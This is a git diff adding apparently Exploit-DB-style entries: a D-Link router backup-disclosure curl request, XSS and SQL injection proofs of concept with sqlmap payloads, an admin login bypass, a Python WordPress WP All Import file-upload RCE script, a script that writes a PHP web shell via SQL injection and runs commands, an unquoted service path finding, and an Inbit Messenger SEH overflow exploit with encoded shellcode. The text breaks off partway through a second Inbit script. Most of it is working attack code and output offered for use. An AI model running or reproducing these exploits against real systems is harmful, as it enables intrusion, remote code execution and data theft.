diff --git a/exploits/hardware/remote/51129.txt b/exploits/hardware/remote/51129.txt new file mode 100644 index 000000000..8fd055cae --- /dev/null +++ b/exploits/hardware/remote/51129.txt @@ -0,0 +1,46 @@ +# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure +# Date: 2022-11-10 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://www.dlink.com +# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09 +# Firmware Version: ME_1.00 +# Tested on: Windows 11 + +# [ Details - DSL-124 ]: +#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office, +#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection, +#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports, +#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet. + +# [ Description ]: +#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system, +#and in response to sending this request, she receives a complete backup of the router settings, +#In fact this happens because of the lack of management of users and sessions in the network. + +# [ POC ]: + +Request : + +curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi + +Response : + +HTTP/1.1 200 OK +Connection: close +Server: Virtual Web 0.9 +Content-Type: application/octet-stream; +Content-Disposition: attachment;filename="config.img" +Pragma: no-cache +Cache-Control: no-cache + + + + + + + + +. +. +. + \ No newline at end of file diff --git a/exploits/hardware/webapps/51130.txt b/exploits/hardware/webapps/51130.txt new file mode 100644 index 000000000..e28b822fd --- /dev/null +++ b/exploits/hardware/webapps/51130.txt @@ -0,0 +1,44 @@ +# Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) +# Author: Bleron Rrustemi +# Discovery Date: 2022-11-15 +# Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/ +# Datasheet:: https://www.uniview.com/download.do?id=1761643 +# Device Firmware: NVR-B3801.20.15.200829 +# Tested Version: NVR301-04S2-P4 +# Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit) +# Vulnerability Type: Reflected Cross-Site Scripting (XSS) +# CVE: N/A + + + + + +# Proof of Concept: + +IP=IP of the device + +http://IP/LAPI/V1.0/System/Security/Login/"> + + + +Best regards, + +Bleron Rrustemi +Chief Technology Officer +Direct: +383 (0) 49 955 503 +E-mail: bleron@drugeza.com + + + + + +Drugëza SHPK +Rr. Lekë Dukagjini p.n +Prishtinë, 10000 • Kosovo +Tel.: +383 49 955 503 +www.drugeza.com + + + + +ü Be GREEN, keep it on the SCREEN \ No newline at end of file diff --git a/exploits/php/webapps/51122.py b/exploits/php/webapps/51122.py new file mode 100755 index 000000000..8e6177e2f --- /dev/null +++ b/exploits/php/webapps/51122.py @@ -0,0 +1,285 @@ +# Exploit Title: WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated) +# Date: 11/05/2022 +# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) +# Vendor Homepage: https://www.wpallimport.com/ +# Software Link: https://wordpress.org/plugins/wp-all-import/advanced/ (scroll down to select the version) +# Version: <= 3.6.7 (tested: 3.6.7) +# Tested on: WordPress 6.1 (os-independent since this exploit does NOT provide the payload) +# CVE: CVE-2022-1565 + +#!/usr/bin/python +import requests +import re +import os + +# WARNING: This exploit does NOT include the payload. +# Also, be sure you already have some valid admin credentials. This exploit needs an administrator account in order to work. +# If a file with the same name as the payload is already on the server, the upload will OVERWRITE it +# +# Please notice that I'm NOT the researcher who found this vulnerability + +# # # # # VULNERABILITY DESCRIPTION # # # # # +# The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. +# This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible. + +# # # # # HOW THE EXPLOIT WORKS # # # # # +# 1. Prepare the zip file: +# - create a PHP file with your payload (e.g. rerverse shell) +# - set the variable "payload_file_name" with the name of this file (e.g. "shell.php") +# - create a zip file with the payload +# - set the variable "zip_file_to_upload" with the PATH of this file (e.g. "/root/shell.zip") +# +# 2. Login using an administrator account: +# - set the variable "target_url" with the base URL of the target (do NOT end the string with the slash /) +# - set the variable "admin_user" with the username of an administrator account +# - set the variable "admin_pass" with the password of an administrator account +# +# 3. Get the wpnonce using the get_wpnonce_upload_file() method +# - there are actually 2 types of wpnonce: +# - the first wpnonce will be retrieved using the method retrieve_wpnonce_edit_settings() inside the PluginSetting class. +# This wpnonce allows us to change the plugin settings (check the step 4) +# - the second wpnonce will be retrieved using the method retrieve_wpnonce_upload_file() inside the PluginSetting class. +# This wpnonce allows us to upload the file +# +# 4. Check if the plugin secure mode is enabled using the method check_if_secure_mode_is_enabled() inside the PluginSetting class +# - if the Secure Mode is enabled, the zip content will be put in a folder with a random name. +# The exploit will disable the Secure Mode. +# By disabling the Secure Mode, the zip content will be put in the main folder (check the variable payload_url). +# The method called to enable and disable the Secure Mode is set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) +# - if the Secure Mode is NOT enabled, the exploit will upload the file but then it will NOT enable the Secure Mode. +# +# 5. Upload the file using the upload_file(wpnonce_upload_file: str) method +# - after the upload, the server should reply with HTTP 200 OK but it doesn't mean the upload was completed successfully. +# The response will contain a JSON that looks like this: +# {"jsonrpc":"2.0","error":{"code":102,"message":"Please verify that the file you uploading is a valid ZIP file."},"is_valid":false,"id":"id"} +# As you can see, it says that there's an error with code 102 but, according to the tests I've done, the upload is completed +# +# 6. Re-enable the Secure Mode if it was enabled using the switch_back_to_secure_mode() method +# +# 7. Activate the payload using the activate_payload() method +# - you can define a method to activate the payload. +# There reason behind this choice is that this exploit does NOT provide any payload. +# Since you can use a custom payload, you may want to activate it using an HTTP POST request instead of a HTTP GET request, or you may want to pass parameters + +# # # # # WHY DOES THE EXPLOIT DISABLE THE SECURE MODE? # # # # # +# According to the PoC of this vulnerability provided by WPSCAN, we should be able to retrieve the uploaded files by visiting the "MAnaged Imports page" +# I don't know why but, after the upload of any file, I couldn't see the uploaded file in that page (maybe the Pro version is required?) +# I had to find a workaround and so I did, by exploiting this option. +# WPSCAN Page: https://wpscan.com/vulnerability/578093db-a025-4148-8c4b-ec2df31743f7 + +# # # # # ANY PROBLEM WITH THE EXPLOIT? # # # # # +# In order for the exploit to work please consider the following: +# 1. check the target_url and the admin credentials +# 2. check the path of the zip file and the name of the payload (they can be different) +# 3. if you're testing locally, try to set verify_ssl_certificate on False +# 4. you can use print_response(http_response) to investigate further + +# Configure the following variables: +target_url = "https://vulnerable.wp/wordpress" # Target base URL +admin_user = "admin" # Administrator username +admin_pass = "password" # Administrator password +zip_file_to_upload = "/shell.zip" # Path to the ZIP file (e.g /root/shell.zip) +payload_file_name = "shell.php" # Filename inside the zip file (e.g. shell.php). This file will be your payload (e.g. reverse shell) +verify_ssl_certificate = True # If True, the script will exit if the SSL Certificate is NOT valid. You can set it on False while testing locally, if needed. + +# Do NOT change the following variables +wp_login_url = target_url + "/wp-login.php" # WordPress login page +wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings +payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here +re_enable_secure_mode = False +session = requests.Session() + +# This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files. +class PluginSetting: + # Regular Expression patterns + pattern_setting_secure_mode = r' + regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text) + if not regex_search: + print("Something went wrong: could not retrieve plugin settings. Are you an administrator?") + # print_response(self.http_response) # for debugging + exit() + self.is_secure_mode_enabled = "checked" in regex_search.group() + + def retrieve_wpnonce_edit_settings(self): + # You can find this wpnonce in the source file by searching for the following input hidden: + # + # 052e2438f9 would be the wpnonce for editing the settings + regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text) + if not regex_search: + print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?") + # print_response(self.http_response) # for debugging + exit() + + self.wpnonce_edit_settings = regex_search.group(1) + + def retrieve_wpnonce_upload_file(self): + # You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b'; + # dee75fdb8b would be the wpnonce for the upload + regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text) + if not regex_search: + print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable") + # print_response(self.http_response) # for debugging + exit() + + self.wpnonce_upload_file = regex_search.group(1) + +def wp_login(): + global session + data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 } + login_cookie = { "wordpress_test_cookie" : "WP Cookie check" } + + # allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found. + # Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not + print("Trying to login...") + response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate) + + if response.status_code == 302: + print("Logged in successfully!") + return + + # print_response(response) # for debugging + print("Login failed. If the credentials are correct, try to print the response to investigate further.") + exit() + +def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response: + global session + if set_to_enabled: + print("Enabling secure mode...") + else: + print("Disabling secure mode...") + + print("Edit settings wpnonce value: " + wpnonce) + data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 } + response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate) + + if response.status_code == 403: + print("Something went wrong: HTTP Status code is 403 (Forbidden). Wrong wpnonce?") + # print_response(response) # for debugging + exit() + return response + +def switch_back_to_secure_mode(): + global session + + print("Re-enabling secure mode...") + response = session.get(url=wp_all_import_page_settings) + plugin_setting = PluginSetting(response) + + if plugin_setting.is_secure_mode_enabled: + print("Secure mode is already enabled") + return + + response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings) + new_plugin_setting = PluginSetting(response) + if not new_plugin_setting.is_secure_mode_enabled: + print("Something went wrong: secure mode has not been re-enabled") + # print_response(response) # for debugging + exit() + print("Secure mode has been re-enabled!") + +def get_wpnonce_upload_file() -> str: + global session, re_enable_secure_mode + # If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload + # If Secure Mode is already disabled, it just returns the wpnonce for the upload + + print("Checking if secure mode is enabled...") + response = session.get(url=wp_all_import_page_settings) + plugin_setting = PluginSetting(response) + + if not plugin_setting.is_secure_mode_enabled: + re_enable_secure_mode = False + print("Insecure mode is already enabled!") + return plugin_setting.wpnonce_upload_file + + print("Secure mode is enabled. The script will disable secure mode for the upload, then it will be re-enabled.") + response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings) + + new_plugin_setting = PluginSetting(response) + + if new_plugin_setting.is_secure_mode_enabled: + print("Something went wrong: secure mode has not been disabled") + # print_response(response) # for debugging + exit() + + print("Secure mode has been disabled!") + re_enable_secure_mode = True + return new_plugin_setting.wpnonce_upload_file + +def upload_file(wpnonce_upload_file: str): + global session + + print("Uploading file...") + print("Upload wpnonce value: " + wpnonce_upload_file) + + zip_file_name = os.path.basename(zip_file_to_upload) + upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file + files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))} + data = { "name" : zip_file_name } + response = session.post(url=upload_url, files=files, data=data) + + if response.status_code == 200: + print("Server replied with HTTP 200 OK. The upload should be completed.") + print("Payload should be here: " + payload_url) + print("If you can't find the payload at this URL, try to print the response to investigate further") + # print_response(response) # for debugging + return 1 + else: + print("Something went wrong during the upload. Try to print the response to investigate further") + # print_response(response) # for debugging + return 0 + +def activate_payload(): + global session + + print("Activating payload...") + response = session.get(url=payload_url) + + if response.status_code != 200: + print("Something went wrong: could not find payload at " + payload_url) + # print_response(response) # for debugging + return + +def print_response(response:requests.Response): + print(response.status_code) + print(response.text) + +# Entry Point +def Main(): + print("Target: " + target_url) + print("Credentials: " + admin_user + ":" + admin_pass) + + # Do the login + wp_login() + + # Retrieve wpnonce for upload. + # It disables Secure Mode if needed, then returns the wpnonce + wpnonce_upload_file = get_wpnonce_upload_file() + + # Upload the file + file_uploaded = upload_file(wpnonce_upload_file) + + # Re-enable Secure Mode if needed + if re_enable_secure_mode: + switch_back_to_secure_mode() + + # Activate the payload + if file_uploaded: + activate_payload() + +Main() \ No newline at end of file diff --git a/exploits/php/webapps/51123.txt b/exploits/php/webapps/51123.txt new file mode 100644 index 000000000..4e3839696 --- /dev/null +++ b/exploits/php/webapps/51123.txt @@ -0,0 +1,18 @@ +# Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS) +# Date: 2022-11-08 +# Exploit Author: Rajeshwar Singh +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip +# Tested on: Windows/XAMPP +########################################################################### + +Payload use = "> + +1. Visit URL http://localhost/bsms_ci/ +2. login with admin Credentials +3. navigate to user Management +4. Click on "Add New System User" +5. Add payload in "Name" input field +6. Click save. +7. Visit http://localhost/bsms_ci/index.php/user +8. XSS payload execute. \ No newline at end of file diff --git a/exploits/php/webapps/51125.txt b/exploits/php/webapps/51125.txt new file mode 100644 index 000000000..ec6223484 --- /dev/null +++ b/exploits/php/webapps/51125.txt @@ -0,0 +1,120 @@ +# Exploit Title: Human Resource Management System - SQL Injection (unauthenticated) +# Date: 08-11-2022 +# Exploit Author: Matthijs van der Vaart (eMVee) +# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip +# Version: 1.0 (Monday, October 10, 2022 - 13:37) +# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 + +1) Capture the login POST request with Burp Suite or OWASP ZAP + +2) Save the request as "login.req" + +3) Run sqlmap as follows: "sqlmap -r login.req" + +Example login.req + +========== + +POST /controller/login.php HTTP/1.1 + +Host: target + +Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda + +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +Content-Type: application/x-www-form-urlencoded + +Content-Length: 66 + +Origin: https://target + +Referer: https://target/index.php + +Upgrade-Insecure-Requests: 1 + +Sec-Fetch-Dest: document + +Sec-Fetch-Mode: navigate + +Sec-Fetch-Site: same-origin + +Sec-Fetch-User: ?1 + +Te: trailers + +Connection: close + +name=admin%40gmail.com&password=password+&submit=Sign+In + + +========= + + +Output example SQL Injection unauthenticated login page + + +========== + +POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n + +sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests: + +--- + +Parameter: password (POST) + +Type: boolean-based blind + +Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + +Payload: name=admin@gmail.com&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In + +Type: error-based + +Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: name=admin@gmail.com&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In + +Type: time-based blind + +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: name=admin@gmail.com&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In + +Parameter: name (POST) + +Type: boolean-based blind + +Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause + +Payload: name=admin@gmail.com' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In + +Type: error-based + +Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + +Payload: name=admin@gmail.com' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In + +Type: time-based blind + +Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + +Payload: name=admin@gmail.com' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In + +--- + +there were multiple injection points, please select the one to use for following injections: + +[0] place: POST, parameter: name, type: Single quoted string (default) + +[1] place: POST, parameter: password, type: Single quoted string + +========== \ No newline at end of file diff --git a/exploits/php/webapps/51132.txt b/exploits/php/webapps/51132.txt new file mode 100644 index 000000000..15d96f404 --- /dev/null +++ b/exploits/php/webapps/51132.txt @@ -0,0 +1,34 @@ +# Exploit Title: Helmet Store Showroom v1.0 - SQL Injection +# Exploit Author: Ameer Hamza +# Date: November 15, 2022 +# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code +# Tested on: Kali Linux, Apache, Mysql +# Vendor: oretnom23 +# Version: v1.0 +# Exploit Description: +# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account. + +[+] The username parameter is vulnerable to SQLi in login page +[+] URL --> http://localhost/hss/admin/login.php +[+] Username = ' OR 1=1-- - + + +HTTP REQUEST + + +POST /hss/classes/Login.php?f=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 38 +Origin: http://localhost +Connection: close +Referer: http://localhost/hss/admin/login.php +Cookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpa + +username='+OR+1%3D1+--+-&password=1234 \ No newline at end of file diff --git a/exploits/php/webapps/51133.py b/exploits/php/webapps/51133.py new file mode 100755 index 000000000..b2d0c4ed5 --- /dev/null +++ b/exploits/php/webapps/51133.py @@ -0,0 +1,43 @@ +# Exploit Title: Revenue Collection System v1.0 - Remote Code Execution (RCE) +# Exploit Author: Joe Pollock +# Date: November 16, 2022 +# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip +# Tested on: Kali Linux, Apache, Mysql +# Vendor: Kapiya +# Version: 1.0 +# Exploit Description: +# Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to +# write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory. +# This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command. +# Ex: python3 rcsv1.py 10.10.14.2 "ls" + +import sys, requests +def main(): + if len(sys.argv) != 3: + print("(+) usage: %s " % sys.argv[0]) + print('(+) eg: %s 192.168.121.103 "ls"' % sys.argv[0]) + sys.exit(-1) + + targetIP = sys.argv[1] + cmd = sys.argv[2] + s = requests.Session() + + # Define obscure filename and command parameter to limit exposure and usage of the RCE. + FILENAME = "youcantfindme.php" + CMDVAR = "ohno" + + # Define the SQL injection string + sqli = """'+UNION+SELECT+"","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME) + + # Write the PHP file to disk using the SQL injection vulnerability + url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli) + r1 = s.get(url1) + + # Execute the user defined command and display the result + url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd) + r2 = s.get(url2) + print(r2.text) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/windows/local/51128.txt b/exploits/windows/local/51128.txt new file mode 100644 index 000000000..3e7932c51 --- /dev/null +++ b/exploits/windows/local/51128.txt @@ -0,0 +1,35 @@ +# Exploit Title: Outline V1.6.0 - Unquoted Service Path +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Discovery Date: 2022-11-10 +# Vendor Homepage: https://getoutline.org/ +# Software Link: https://getoutline.org/ +# Tested Version: V1.6.0 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Microsoft Windows 11 Enterprise +# Step to discover Unquoted Service Path: + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ + +Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe +                      Auto + +C:\>sc qc OutlineService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: OutlineService +        TYPE               : 10  WIN32_OWN_PROCESS +        START_TYPE         : 2   AUTO_START +        ERROR_CONTROL      : 1   NORMAL +        BINARY_PATH_NAME   : C:\Program Files (x86)\Outline\OutlineService.exe +         +LOAD_ORDER_GROUP   : +        TAG                : 0 +        DISPLAY_NAME       : OutlineService +        DEPENDENCIES       : +        SERVICE_START_NAME : LocalSystem + +C:\>systeminfo + +OS Name:  Microsoft Windows 11 Enterprise +OS Version: 10.0.22000 N/A Build 22000 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/exploits/windows/remote/51126.py b/exploits/windows/remote/51126.py new file mode 100755 index 000000000..2be9b5cb4 --- /dev/null +++ b/exploits/windows/remote/51126.py @@ -0,0 +1,121 @@ +# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow +# Date: 11/08/2022 +# Exploit Author: a-rey +# Vendor Homepage: http://www.inbit.com/support.html +# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html +# Version: v4.6.0 - v4.9.0 +# Tested on: Windows XP SP3, Windows 7, Windows 10 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import sys, socket, struct, argparse, logging + +""" +/opt/metasploit-framework/bin/msfvenom \ + -p windows/messagebox \ + ICON=WARNING \ + TEXT="get wrecked" \ + TITLE="LOLZ" \ + EXITFUNC=thread \ + -f py \ + -v SHELLCODE \ + -e x86/shikata_ga_nai \ + -b '\x3E' +""" +SHELLCODE = b"" +SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4" +SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14" +SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1" +SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd" +SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07" +SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29" +SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde" +SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e" +SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc" +SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43" +SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0" +SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee" +SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20" +SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50" +SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19" +SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77" +SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f" +SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd" +SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f" +SHELLCODE += b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86" +SHELLCODE += b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93" +SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40" +SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44" +SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e" +SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf" +SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3" + +BANNER = """\033[0m\033[1;35m +╔═════════════════════════════════════════════════════════════════════╗ +║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m║ +╚═════════════════════════════════════════════════════════════════════╝\033[0m + by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗ + \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ + \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ + \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ + \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ + \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ +\033[0m""" + +BAD_BYTES = b"\x3e" # > +PAYLOAD_LENGTH = 2000 + +nSEH = b"\xEB\x06\x90\x90" # JMP SHORT 0x8; NOP; NOP +SEH = struct.pack(" None: + pkt = b"<" + pkt += (b"A" * 40) + pkt += nSEH + pkt += SEH + pkt += NULL_ACT_CTX_STUB + pkt += (b"\x90" * 32) # NOP sled for shikata_ga_nai decoder + pkt += SHELLCODE + # NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack + pkt += (b"B" * (PAYLOAD_LENGTH - len(pkt))) + # NOTE: check for bad bytes + for c in pkt: + if c in BAD_BYTES: + logging.error(f"found bad byte 0x{c:02x} in payload") + sys.exit(-1) + logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...") + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((targetIp, targetPort)) + s.send(pkt) + s.close() + logging.success("DONE") + +if __name__ == '__main__': + # parse arguments + parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) + parser.add_argument('-t', '--target', help='target IP', type=str, required=True) + parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) + args = parser.parse_args() + # define logger + logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') + logging.SUCCESS = logging.CRITICAL + 1 + logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') + logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') + logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') + logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') + logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) + # print banner + print(BANNER) + # run exploit + exploit(args.target, args.port) \ No newline at end of file diff --git a/exploits/windows/remote/51127.py b/exploits/windows/remote/51127.py new file mode 100755 index 000000000..4db60b85f --- /dev/null +++ b/exploits/windows/remote/51127.py @@ -0,0 +1,121 @@ +# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) +# Date: 11/08/2022 +# Exploit Author: a-rey +# Vendor Homepage: http://www.inbit.com/support.html +# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html +# Version: v4.6.0 - v4.9.0 +# Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019 +# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import sys, socket, struct, string, argparse, logging + +BANNER = """\033[0m\033[1;35m +╔══════════════════════════════════════════════════════════════════════════╗ +║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║ +╚══════════════════════════════════════════════════════════════════════════╝\033[0m + by: \033[1;36m █████╗ ██████╗ 